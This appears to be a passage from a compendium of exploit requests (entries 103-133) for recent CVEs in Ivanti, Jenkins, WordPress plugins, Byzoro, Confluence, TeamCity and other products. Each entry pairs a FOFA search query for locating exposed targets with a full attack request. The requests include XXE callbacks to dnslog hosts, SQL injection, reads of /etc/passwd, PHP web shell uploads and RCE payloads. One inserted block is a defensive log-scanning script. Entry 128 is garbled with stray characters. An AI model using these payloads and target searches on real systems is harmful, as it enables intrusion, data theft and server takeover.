<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML file contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

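Added example, not from the original post or any vendor's code: a Python access-log triage script that flags request lines matching the endpoints documented in entries 92-121 of this list, so defenders can sweep web or reverse-proxy logs for probing of these paths. The log lines, timestamps and addresses are constructed; only signatures visible in a request line are covered, so probes carried in POST bodies (entry 112, for example) need body-level inspection.

```python
"""Access-log triage for the request signatures in entries 92-121 above.

Added example, not part of the original post or of any vendor's code: it
parses Combined-Log-Format lines, URL-decodes the request path and reports
lines that match the request lines documented in this section. Log lines and
addresses below are constructed (RFC 5737 ranges), not real traffic.
"""
import re
from urllib.parse import unquote

# (entry number, label, regex over "METHOD decoded-path").
# Entry 0 is a generic marker for the updatexml()/sleep() probes used by
# entries 105-107, 114 and 117, whose payload sits in the query string.
SIGNATURES = [
    (92, "Hikvision /center/api/session", re.compile(r"^POST /center/api/session\b")),
    (93, "SecGate3600 app_av_import_save", re.compile(r"^POST /\?g=app_av_import_save\b")),
    (94, "SecGate3600 obj_area_import_save", re.compile(r"^POST /\?g=obj_area_import_save\b")),
    (95, "OFBiz xmlrpc auth bypass CVE-2023-49070",
     re.compile(r"^POST /webtools/control/xmlrpc\b.*requirePasswordChange=Y")),
    (96, "OFBiz ProgramExport groovy",
     re.compile(r"^POST /webtools/control/ProgramExport\b.*requirePasswordChange=Y")),
    (98, "SpiderFlow /function/save CVE-2024-0195", re.compile(r"^POST /function/save\b")),
    (99, "Ncast busiFacade.php CVE-2024-0305", re.compile(r"^POST /classes/common/busiFacade\.php\b")),
    (101, "Ivanti keys-status command injection CVE-2024-21887",
     re.compile(r"^GET /api/v1/totp/user-backup-code/\.\./\.\./license/keys-status/;")),
    (102, "Ivanti saml20.ws SSRF CVE-2024-21893", re.compile(r"^POST /dana-ws/saml20\.ws\b")),
    (103, "Ivanti saml-sso.cgi XXE CVE-2024-22024", re.compile(r"^POST /dana-na/auth/saml-sso\.cgi\b")),
    (108, "D-Tale web-upload SSRF CVE-2024-21642", re.compile(r"^GET /dtale/web-upload\?.*\burl=")),
    (109, "Jenkins CLI file read CVE-2024-23897", re.compile(r"^POST /cli\?remoting=false\b")),
    (110, "GoAnywhere InitialAccountSetup CVE-2024-0204",
     re.compile(r"^GET /goanywhere/images/\.\.;/wizard/InitialAccountSetup\.xhtml")),
    (113, "WP Automatic file download CVE-2024-27954",
     re.compile(r"^GET /\?.*\bwp_automatic=download\b.*\blink=file:")),
    (115, "Bricks render_element CVE-2024-25600", re.compile(r"^POST /wp-json/bricks/v1/render_element\b")),
    (118, "Byzoro uploadfile.php CVE-2024-0939", re.compile(r"^POST /Tool/uploadfile\.php")),
    (120, "Byzoro web.php upload CVE-2024-1253", re.compile(r"^POST /useratte/web\.php")),
    (121, "Byzoro userattestation.php upload CVE-2024-1918", re.compile(r"^POST /useratte/userattestation\.php")),
    (0, "updatexml()/sleep() SQL injection probe in query string", re.compile(r"(?i)\b(updatexml|sleep)\(")),
]

# Combined/common log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def match_request(method, raw_path):
    """Return [(entry, label)] for every signature the request matches.

    The path is URL-decoded first so that %3b, %28 and similar cannot hide a
    pattern. Run this over the raw request log, not a normalised one: proxies
    may collapse '../' and '..;' before the request reaches the application.
    """
    target = f"{method} {unquote(raw_path)}"
    return [(entry, label) for entry, label, rx in SIGNATURES if rx.search(target)]


def scan_log(lines):
    """Parse log lines and return one finding dict per (line, signature) hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the sweep
        for entry, label in match_request(m["method"], m["path"]):
            findings.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "entry": entry, "label": label, "path": m["path"],
            })
    return findings


def summarize_by_ip(findings):
    """Map each source IP to the sorted list of distinct entry numbers it hit."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["entry"])
    return {ip: sorted(entries) for ip, entries in by_ip.items()}


# Constructed sample lines: one benign request plus probes of five entries.
LOG_LINES = [
    '203.0.113.7 - - [10/Feb/2024:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Feb/2024:03:14:09 +0000] "POST /cli?remoting=false HTTP/1.1" 200 96',
    '198.51.100.2 - - [10/Feb/2024:03:15:01 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20example.invalid HTTP/1.1" 403 0',
    '198.51.100.2 - - [10/Feb/2024:03:15:30 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 240',
    '192.0.2.9 - - [10/Feb/2024:03:16:12 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 3310',
    '192.0.2.9 - - [10/Feb/2024:03:16:40 +0000] "POST /wp-json/bricks/v1/render_element HTTP/1.1" 200 180',
]

if __name__ == "__main__":
    hits = scan_log(LOG_LINES)
    for f in hits:
        print(f'{f["time"]} {f["ip"]:<14} entry {f["entry"]:>3} {f["label"]}  {f["path"]}')
    print(summarize_by_ip(hits))
```

A 200 response on a flagged path (as on the constructed Jenkins, GoAnywhere and Bricks lines) deserves more attention than a 403 or 404, which usually means the probe was rejected or the product is not present.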
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Byzoro (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

122. Byzoro (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the SQL statement base64-encoded (not encrypted): sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
The OGNL expression in the x parameter runs the command and writes its output into the X-Cmd-Response response header, so check that header rather than the body.
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then served at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been added, log in to the admin backend with it; system commands can then be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

7 k3 F$ K4 }! k' F$ a  |128. Adobe ColdFusion 反序列化9 t) G; l" r0 t2 x) _7 J$ W1 l( w
CVE-2023-38203* Z7 U1 }$ j6 z
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本); _, O4 g4 h3 `" W  L; l7 V* S5 e
FOFA:app="Adobe-ColdFusion"- ^3 `1 I6 A0 a# Q
PAYLOAD8 B1 j3 g) ?, z9 s* }3 X/ P. Q5 o
' p! l6 i' T& I1 o
129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in a request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
The request path does not exist; the jsp parameter names the REST endpoint the request is forwarded to, with ;.jsp appended so it passes as a JSP resource. The body creates a SYSTEM_ADMIN user.
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199 (same product; a .. segment after an allow-listed prefix reaches admin pages)
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5云商城) file.php file upload
